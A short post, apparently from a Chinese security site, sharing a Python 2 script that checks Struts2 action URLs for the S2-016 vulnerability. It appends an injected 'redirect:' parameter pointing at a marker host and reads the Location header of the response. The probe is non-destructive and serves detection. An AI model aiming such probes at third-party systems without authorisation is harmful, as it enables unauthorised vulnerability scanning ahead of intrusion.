最近的struts2漏洞检测脚本,现在各大网站应该已经修复。

#!/usr/bin/env python
# -*- coding=utf-8 -*-

'''
author: xjump.me#at#gmail.com
file: struts_s2-016_vul_checker.py
usage:
  set the URLs to test in check_urls, then
  run `python struts_s2-016_vul_checker.py`
ref:
  http://struts.apache.org/release/2.3.x/docs/s2-016.html
'''

# Targets to probe, one action URL per entry. do_scan() appends "?" plus the
# probe parameter to each entry as-is, so list URLs without a query string.
check_urls = [
  "http://localhost:8080/struts2-blank/example/HelloWorld.action",
]

import pycurl
import sys
import urlparse

# Request headers sent with every probe. do_scan() turns each pair into a
# "Name: value" line and also passes the User-Agent to pycurl separately.
headers = {
  "User-Agent": "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)",
  "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  "Accept-Language": "en-US,en;q=0.8",
  "Accept-Charset": "utf-8;q=0.7,*;q=0.3",
  "Connection": "keep-alive",
}

# Probe parameter appended to each target URL. The host named here is only a
# marker: do_scan() looks for it in the response's Location header.
payload_scan = "redirect:http://wooyun.org"

def line_sep():
  '''Print a row of 79 asterisks as a visual separator.'''
  separator = "*" * 79
  # Single-argument print(...) behaves the same as the print statement.
  print(separator)

class Handler:
  '''Accumulate the chunks pycurl hands to a write or header callback.'''

  def __init__(self):
    # Everything received so far, concatenated in arrival order.
    self.data = ''

  def write_callback(self, buf):
    '''Append one received chunk to the accumulated data.'''
    self.data += buf

  def get_data(self):
    '''Return everything received so far as a single string.'''
    collected = self.data
    return collected

def debug_cb(debug_type, debug_msg):
  '''Print one libcurl debug record; registered as DEBUGFUNCTION by do_scan.

  debug_type is formatted with %d and debug_msg with %s.
  '''
  record = "debug(%d): %s" % (debug_type, debug_msg)
  print(record)
  
def progress_cb(total, existing, upload_t, upload_d):
  '''Ignore transfer progress; registered as PROGRESSFUNCTION by do_scan.

  The four arguments are accepted and discarded. An earlier percentage
  display was disabled by the author and is not reproduced here.
  '''
  return None
    
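def do_scan(url, arg_timeout=1000, debug=0):
  '''Check one URL for the S2-016 `redirect:` behaviour and print the verdict.

  Sends a single GET for url + "?" + payload_scan and inspects only the
  headers of that one response. If a Location header points at the marker
  host from payload_scan, the URL is reported as vulnerable.

  A "[-] ... is Secured" line only means the marker redirect was not seen in
  this response. An error page, a filtering proxy or a non-Struts endpoint
  gives the same result, so confirm the installed Struts version before
  treating a host as patched.

  Args:
    url: action URL to test. The probe is appended after a "?", so a URL
      that already has a query string yields a malformed request.
    arg_timeout: value passed to pycurl's TIMEOUT option (seconds).
    debug: when truthy, enables libcurl verbose output and the debug and
      progress callbacks.

  Returns:
    None. The result is printed to stdout.
  '''
  h_body = Handler()
  h_head = Handler()

  attack_url = url + "?" + payload_scan
  host = urlparse.urlparse(url).netloc

  c = pycurl.Curl()
  try:
    c.setopt(c.URL, attack_url)
    c.setopt(
      c.HTTPHEADER,
      ["Host: %s" % host] + ["%s: %s" % pair for pair in headers.items()],
    )
    c.setopt(c.USERAGENT, headers["User-Agent"])

    # The body is captured only so pycurl does not write it to stdout; the
    # verdict depends on the headers alone.
    c.setopt(c.WRITEFUNCTION, h_body.write_callback)
    c.setopt(c.HEADERFUNCTION, h_head.write_callback)

    if debug:
      c.setopt(c.NOPROGRESS, 0)
      c.setopt(c.PROGRESSFUNCTION, progress_cb)
      c.setopt(c.DEBUGFUNCTION, debug_cb)
      c.setopt(c.VERBOSE, debug)

    c.setopt(c.HTTPGET, 1)
    # Never follow the redirect: the check reads the first response's Location
    # header, and the marker host itself must not be contacted.
    c.setopt(c.FOLLOWLOCATION, 0)
    c.setopt(c.TIMEOUT, arg_timeout)
    c.setopt(c.HTTP_VERSION, c.CURL_HTTP_VERSION_1_1)

    try:
      c.perform()
    except Exception as e:
      # Report unreachable targets instead of skipping them silently, so a
      # failed request is not mistaken for a host that was never checked.
      print("[!] %s could not be checked: %s" % (url, e))
      return
  finally:
    # Release the handle on every path, including failed requests.
    c.close()

  head = h_head.get_data()

  # Header names are case-insensitive, so match per header line instead of
  # searching the raw text for one exact spelling. This also stops headers
  # such as Content-Location from counting as a hit. The expected value must
  # stay in sync with the marker host in payload_scan.
  redirected = False
  for line in head.splitlines():
    name, sep, value = line.partition(":")
    if not sep:
      continue
    if name.strip().lower() == "location" and value.strip().startswith("http://wooyun.org"):
      redirected = True
      break

  if redirected:
    print("\n[+] Vul found for %s.\n" % url)
  else:
    print("[-] %s is Secured." % url)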

if __name__ == "__main__":
  # Probe each configured target in order; do_scan prints its own verdict.
  for target in check_urls:
    do_scan(target, debug=0)